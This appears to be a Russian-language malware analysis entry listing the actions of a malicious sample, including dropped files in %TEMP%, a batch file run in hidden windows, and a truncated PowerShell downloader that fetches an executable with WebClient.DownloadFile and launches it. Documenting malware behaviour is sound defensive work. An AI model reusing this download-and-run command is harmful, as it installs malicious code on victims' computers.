Техническая информация
- $rrdeulte как %temp%\dqohccjx.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function bfsebdpyb8([String] $Rrdeulte){(New-Object System.Net.WebClient).DownloadFile($Rrdeulte,''%TEMP%\dqohccjx.exe'');Start-Process ''%TEMP%\dqohccjx.exe'';}try...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1840
- %TEMP%\pqrecmebrpie.bat
- %TEMP%\1200646.cvr
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function bfsebdpyb8([String] $Rrdeulte){(New-Object System.Net.WebClient).DownloadFile($Rrdeulte,''%TEMP%\dqohccjx.exe'');Start-Process ''%TEMP%\dqohccjx.exe'';}try...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\pqrecmebrpie.bat" "' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\pqrecmebrpie.bat" "